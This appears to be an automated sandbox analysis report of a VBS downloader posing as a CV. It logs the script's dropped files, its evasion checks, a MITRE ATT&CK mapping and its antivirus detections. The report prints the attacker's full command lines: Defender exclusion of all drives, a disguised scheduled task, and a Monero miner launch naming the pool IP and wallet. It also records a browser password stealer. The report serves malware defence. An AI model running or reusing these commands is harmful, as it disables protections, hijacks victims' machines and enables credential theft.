Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\WindowsUpdate\mservice.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Potential evasive VBS script found (sleep loop)

Source: C:\Users\Public\7g.exe	Dropped file: do while 1 wscript.sleep(10000)			Jump to dropped file
Source: C:\Users\Public\7g.exe	Dropped file: Do Until .NameSpace(zipFile).Items.Count = _ WScript.Sleep 1000			Jump to dropped file

Query firmware table information (likely to detect VMs)

Source: C:\Users\Public\WindowsUpdate\mservice.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4277	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4751	Jump to behavior
Source: C:\Users\Public\WindowsUpdate\mservice.exe	Window / User API: threadDelayed 9990	Jump to behavior

Source: C:\Users\Public\7g.exe	Dropped PE file which has not been started: C:\Users\Public\WindowsUpdate\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\Public\7g.exe	Dropped PE file which has not been started: C:\Users\Public\WindowsUpdate\ps.exe	Jump to dropped file
Source: C:\Users\Public\7g.exe	Dropped PE file which has not been started: C:\Users\Public\WindowsUpdate\go.exe	Jump to dropped file

Source: C:\Users\Public\7g.exe

API coverage: 9.2 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 616	Thread sleep count: 4277 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3328	Thread sleep count: 4751 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6732	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\Public\WindowsUpdate\mservice.exe TID: 2020	Thread sleep time: -199800s >= -30000s	Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\WindowsUpdate\mservice.exe	Last function: Thread delayed

Source: C:\Users\Public\7g.exe

Code function: 11_2_009D65A1 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,

11_2_009D65A1

Source: C:\Users\Public\7g.exe

Code function: 11_2_009D71B5 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

11_2_009D71B5

Source: C:\Users\Public\7g.exe

Code function: 11_2_009D9823 GetSystemInfo,

11_2_009D9823

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: mservice.exe, 00000015.00000002.3393018835.000002459BFEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp1
Source: wscript.exe, 00000014.00000003.2493163295.000001B9D34E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}"
Source: mservice.exe, 00000015.00000002.3393018835.000002459BFEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
Source: wscript.exe, 00000004.00000003.2458037507.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462730490.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459381341.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460969786.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, mservice.exe, 00000015.00000002.3393018835.000002459BFEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000004.00000002.2462687833.000001ADB8519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2458037507.000001ADB8519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8517000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB8519000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWin

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\7g.exe

11_2_00A0A7BC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: 7zr[1].exe.4.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 49.12.202.237 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.65.251.78 443			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im chrome.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im chrome.exe

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kzidsk2vumqnv72slmmriztnsjtythjrfxebrzcdjjvhtn83t5teyjuggdnlbtydwgsghqc2n3lzonqdqppn6symjyr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kzidsk2vumqnv72slmmriztnsjtythjrfxebrzcdjjvhtn83t5teyjuggdnlbtydwgsghqc2n3lzonqdqppn6symjyr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title			Jump to behavior

Source: conhost.exe, 00000016.00000002.3393187699.000002279FFC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: conhost.exe, 00000016.00000002.3393187699.000002279FFC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000016.00000002.3393187699.000002279FFC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000016.00000002.3393187699.000002279FFC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\Public\7g.exe

Code function: 11_2_00A3F920 cpuid

11_2_00A3F920

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Users\Public\7g.exe

Code function: 11_2_009DA540 GetSystemTimeAsFileTime,

11_2_009DA540

Source: C:\Users\Public\7g.exe

Code function: 11_2_00A3D230 GetVersion,GetModuleHandleW,GetProcAddress,

11_2_00A3D230

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 11.3.7g.exe.32a7600.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.7g.exe.32a7600.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.7g.exe.3270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7g.exe PID: 1968, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\WindowsUpdate\ps.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	11 Windows Management Instrumentation	1 Windows Service	1 Access Token Manipulation	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	621 Scripting	1 Scheduled Task/Job	1 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Native API	1 Registry Run Keys / Startup Folder	112 Process Injection	621 Scripting	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	2 Exploitation for Client Execution	Login Hook	1 Scheduled Task/Job	31 Obfuscated Files or Information	NTDS	211 Security Software Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	13 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	1 Command and Scripting Interpreter	Network Logon Script	1 Registry Run Keys / Startup Folder	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	1 Scheduled Task/Job	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	1 PowerShell	Startup Items	Startup Items	111 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	112 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
curriculum_vitae-copie.vbs	8%	ReversingLabs	Script-WScript.Downloader.Heuristic
curriculum_vitae-copie.vbs	18%	Virustotal		Browse
curriculum_vitae-copie.vbs	100%	Avira	VBS/Dldr.Agent.VPVO

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\WindowsUpdate\mservice.exe	100%	Avira	HEUR/AGEN.1311290
C:\Users\Public\WindowsUpdate\mservice.exe	100%	Joe Sandbox ML
C:\Users\Public\7g.exe	0%	ReversingLabs
C:\Users\Public\7g.exe	1%	Virustotal		Browse
C:\Users\Public\WindowsUpdate\WinRing0x64.sys	6%	ReversingLabs
C:\Users\Public\WindowsUpdate\WinRing0x64.sys	1%	Virustotal		Browse
C:\Users\Public\WindowsUpdate\go.exe	28%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\WindowsUpdate\go.exe	28%	Virustotal		Browse
C:\Users\Public\WindowsUpdate\mservice.exe	56%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Users\Public\WindowsUpdate\mservice.exe	73%	Virustotal		Browse
C:\Users\Public\WindowsUpdate\ps.exe	81%	ReversingLabs	Win32.PUA.PassView
C:\Users\Public\WindowsUpdate\ps.exe	76%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7zr[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7zr[1].exe	1%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
https://xmrig.com/docs/algorithms	0%	URL Reputation	safe
https://snowplow.trx.gitlab.net	0%	Avira URL Cloud	safe
http://microsoft.co	0%	Avira URL Cloud	safe
https://collector.prd-278964.gl-product-analytics.com	0%	Avira URL Cloud	safe
https://new-sentry.gitlab.net	0%	Avira URL Cloud	safe
https://xmrig.com/wizard%s	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env	0%	Avira URL Cloud	safe
https://sentry.gitlab.net	0%	Avira URL Cloud	safe
https://collector.prd-278964.gl-product-analytics.com	0%	Virustotal		Browse
http://microsoft.co	0%	Virustotal		Browse
https://xmrig.com/wizard	0%	Virustotal		Browse
https://www.recaptcha.net/	0%	Avira URL Cloud	safe
https://new-sentry.gitlab.net	0%	Virustotal		Browse
https://snowplow.trx.gitlab.net	0%	Virustotal		Browse
https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env	0%	Virustotal		Browse
https://www.recaptcha.net/	0%	Virustotal		Browse
https://xmrig.com/wizard%s	0%	Virustotal		Browse
https://sentry.gitlab.net	0%	Virustotal		Browse

Domains and IPs

